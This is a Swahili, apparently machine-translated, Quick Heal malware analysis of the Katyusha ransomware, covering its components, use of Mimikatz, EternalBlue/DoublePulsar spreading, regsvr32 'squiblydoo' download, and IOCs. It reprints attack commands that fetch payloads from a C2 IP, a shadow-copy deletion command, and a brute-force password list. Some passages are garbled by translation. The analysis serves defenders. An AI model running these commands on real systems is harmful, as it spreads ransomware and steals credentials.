Kwa miezi kadhaa, Maabara ya Usalama ya Quick Heal imekuwa ikiona ongezeko la ransomware, tumepata ransomware nyingine ya kuvutia ambayo husimba faili kwa njia fiche na kuongeza kiendelezi ".katyusha" na kudai kiasi cha 0.5 btc ndani ya siku tatu na kutishia kutoa data hiyo kwa umma ikiwa fidia haitalipwa. Programu hasidi imeunganishwa na vipengele vingi ikiwa ni pamoja na kutumia " Double pulsar " na " Eternal blue " ambayo hutumika kusambaa kwenye mtandao. Pia, hutumia mbinu ya kipekee ya kushambulia inayoitwa " squiblydoo " kusambaa kwenye mtandao. Kiashiria cha maambukizi cha ransomware hii bado hakijathibitishwa, lakini kwa msingi wa sifa ransomware hii inaweza kuingia kwenye mfumo kupitia ulaghai wa kisiri, ulaghai, barua taka, ulaghai wa SMB n.k.
Uchambuzi wa Kiufundi :
Programu hasidi hii imejaa MPRESS(v2.19) na inapatikana kwenye mfumo wa mwathiriwa kwa jina " katyusha.exe " katika "%temp%". Ina vipengele vitatu. Inapotekelezwa, inaviingiza kwenye C:\Windows\Temp na kuanza utekelezaji wake:
- Svchost0.bat
- Zkts.exe
- Ktsi.exe
Katyusha hukagua faili zifuatazo kwenye mfumo ili kubaini ikiwa mfumo tayari umeambukizwa au la.
"C:\_how_to_decrypt_you_files.txt"
"C:\ProgramData\_how_to_decrypt_you_files.txt"
Ikiwa mfumo tayari umeambukizwa, Katyusha huunda faili batch (svchost0.bat) ambayo ina msimbo kama inavyoonyeshwa kwenye Mchoro.1. kufuta nakala ya kibinafsi na kusitisha yenyewe. Ikiwa mfumo haujaambukizwa basi huacha zkts.exe na ktsi.exe na kuzitekeleza.

Zkts.exe :
Faili hii ni 7zip inayoweza kutekelezeka na kipengee kikuu ambacho kina moduli ndogo nyingi kama moduli ya kueneza mtandao, moduli ya kuiba nenosiri, n.k.
Katika utekelezaji wa zkts.exe, hutoa vipengele katika " C:\Windows\Temp " kama vile Mimikatz, katyusha.dll, eternal blue exploit, n.k. ambavyo baadaye hutumiwa na Katyusha kufanya shughuli.

Ktsi.exe (Kisimbaji fiche):
Hii ni sehemu nyingine kuu ambayo pia ni faili iliyopakiwa ya MPRESS. Inatumika zaidi kwa usimbaji fiche wa faili na kudondosha noti ya fidia kwenye mfumo wa mwathiriwa. Mchakato huu unaanza kwa kujitegemea na upakiaji mkuu (katyusha.exe) kama inavyoonyeshwa kwenye Mchoro 3.

Kwenye utekelezaji wa ktsi.exe, kwanza huua orodha ya kazi zifuatazo kutoa vishikizo vya faili ambavyo vimefungwa na michakato inayofaa ya kusimba (kama vile faili za db, nk) kama inavyoonyeshwa kwenye Mchoro 4.
Ili kusimba faili zinazohusiana na hifadhidata kwa mafanikio, ktsi inaua michakato ambayo inahusiana na programu tumizi za hifadhidata. Ifuatayo ni orodha ya michakato iliyosimbwa kwa bidii katika programu hasidi:
| mysqld.exe | httpd.exe | sqlsevr.exe |
| sqlwriter.exe | w3wp.exe | sqlagent.exe |
| fdhost.exe | fdlauncher.exe | kuripotiserviceservice.exe |
| omtsreco.exe | tnslsnr.exe | oracle.exe |
| emagent.exe | mysqld-nt.exe |

Baada ya utendakazi wa programu hasidi hudondosha noti ya fidia katika html na umbizo la txt kwenye njia iliyo chini ili kuifanya ionekane kwa watumiaji wote wakati wa kuanzisha mfumo,
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
_how_to_decrypt_you_files.txt
_how_to_decrypt_you_files.html
Katika “C:\ProgramData” na kwenye mzizi wa hifadhi ya C(C:\) dondosha dokezo la fidia pekee kama “_how_to_decrypt_you_files.txt”.

Ktsi.exe pia hufuta nakala ya kivuli kwa kutekeleza amri ifuatayo,
"Vssadmin futa vivuli / vyote / kimya"

Baada ya kazi hizi zote, ktsi.exe huanza usimbaji fiche wa faili (RSA) kwa msaada wa mbinu ya kawaida ya usimbaji fiche ya CRYPTOGAMS . Saini zinazohusiana na algoriti hii zinapatikana katika faili, kama inavyoonyeshwa kwenye Mchoro 7.

Inasimba faili zote za kiendelezi isipokuwa ifuatayo,

Pia ina orodha ya kutengwa ya faili na folda (kama inavyoonyeshwa kwenye tini 9) ikiwa maneno haya yatapatikana katika njia ya faili iliyoorodheshwa basi itatenga njia hiyo kutoka kwa usimbaji fiche. Ili kutekeleza usimbaji fiche usiokatizwa, orodha ina majina ya bidhaa chache za usalama.

Utaratibu wa Kueneza:
Kwa uenezaji wa mtandao, faili zilizotolewa kutoka kwa zkts huja katika jukumu. Tafadhali rejelea Kielelezo 2 kwa vipengele vilivyotolewa.
m32.exe na m64.exe ni zana ya Mimikatz ambayo hutumiwa kupata hati tambulishi kutoka kwa windows lsass.exe.
Kwanza, katyusha.exe huamua ikiwa mfumo ni 64bit au 32bit kwa kutumia simu ya mfumo IsWow64Process (hurejesha thamani isiyo ya kawaida ikiwa mfumo ni 64-bit) na kutekeleza Mimikatz kulingana na usanifu wa mfumo.
Zana ya Mimikatz huachilia faili zinazofuata katika “C:\Windows\Temp” kama matokeo.
– snamelog : ina majina ya watumiaji yaliyoletwa.
– spaslog : ina manenosiri ya majina ya watumiaji yanayoletwa.

Baada ya utekelezaji wa mimikatz, katyusha.exe inasoma majina ya watumiaji kutoka kwa snamelog na nywila kutoka kwa spasslog ambayo hutumiwa kufanya shambulio la nguvu kwenye mtandao.
Zkts.exe pia matone svchostb.exe, svchostb.xml, svchostbs.exe, svchostbs.xml, katyusha.dll na svchostp.exe. Vipengele hivi hutumiwa kueneza Katyusha kwenye mtandao.

Kwa usaidizi wa unyonyaji wa milele wa bluu na pulsar mbili, programu hasidi hutekeleza katyusha.dll kwenye mifumo iliyounganishwa kwenye mtandao kwa mfuatano. Kwa katyusha.exe hii tumia hatari ya SMB kwa msaada wa amri ifuatayo,
"C:\windows\temp\&svchostb.exe -TargetIp & svchostbs.exe –OutConfig s –TargetPort 445 –Itifaki SMB –Architecture x64 –Function RunDLL –DllPayload katyusha.dll –TargetIp ”

Katyusha.dll ni faili ya upakiaji ina msimbo wa kutekeleza amri ifuatayo,
"regsvr32 /u /s /i:hxxp://86.106.102.147/img/katyusha.data scrobj.dll"
Tunaweza pia kupata mifuatano ya amri yenye msimbo mgumu katika faili kama inavyoonyeshwa kwenye Mchoro 12.

Unapotekeleza amri ya regsvr32 (Seva ya Usajili ya Microsoft) hapo juu, itapakua hati (katyusha.data) kutoka kwa URL iliyotolewa na kuita seva ya kufuta usajili kwa kutumia kigezo cha regsvr32 (/u). Hii itatekeleza msimbo wa javascript chini ya lebo ya <registration> kutoka kwa hati iliyopakuliwa kama inavyoonyeshwa kwenye Mchoro 13. Hati ina msimbo wa kupakua katyusha.exe kutoka kwa Url iliyotolewa kwenye saraka ya "%temp%" na kuitekeleza.


Shambulio kama hilo lenye amri za regsvr32 ili kupakua hati kutoka kwa C&C na kuzitekeleza hujulikana kama "squiblydoo".
Baada ya hatua iliyo hapo juu, pia huenda kwenye mifumo ya nguvu kali kwenye mtandao kwa msaada wa Zana ya Utawala wa Nguvu (svchostp.exe). Zana hii ni sawa na zana ya sysinternals PsExec , inayotumika kutekeleza michakato kwenye mfumo wa mbali. Ransomware hii yenyewe ina orodha ya majina machache ya watumiaji na nywila kama ilivyoonyeshwa hapa chini, pamoja na kwamba pia hutumia majina ya watumiaji na nywila zilizoletwa na Mimikatz (snamelog na spasslog) kwa shambulio la nguvu kali.
Majina ya Watumiaji :
Msimamizi, msimamizi, +maudhui ya snamelog.
Manenosiri :
admin, 12345, chinachina203, 111, 123456, qwerty, mtihani, abc123, 12345678, 0000, 1122, 1234, +yaliyomo ya spaslog.
Kwa kulazimisha kikatili, katyusha hutumia amri ifuatayo:
"C:\Windows\temp\svchostp.exe -u -p -n 10 -s regsvr32 /u /s /i:https://86.106.102.147/img/katyusha.data scrobj.dll”
Amri iliyo hapo juu hutekeleza tu matumizi ya regsvr32 na url kama kigezo cha kupakua upakiaji na kufanya shughuli kama ilivyoelezwa hapo juu kwa katyusha.dll.

IOC :
MD5: 7f87db33980c0099739de40d1b725500
Urls:
- hxxp://86.106.102.147/img/katyusha.data
- hxxp://86.106.102.147/img/katyusha.exe
Anwani ya Pochi ya Bitcoin: “3ALmvAWLEothnMF5BjckAFaKB5S6zan9PK”
Hitimisho :
Mwaka huu tumeona ongezeko la idadi ya ransomware, wanatumia njia mpya za kueneza na pia kwa kusimba data. Sasa, maradhi mengi ya fidia yameunganishwa na matumizi mabaya na zana kama vile bluu ya milele, mimikatz za kueneza kwenye mtandao. Tunapendekeza watumiaji waepuke kufikia Url/barua pepe zinazotiliwa shaka, watumie vitambulisho thabiti vya mfumo na kusasisha kingavirusi yao.
Mtaalam wa Mada:
Pratik Pachpor | Maabara ya Usalama ya Uponyaji Haraka



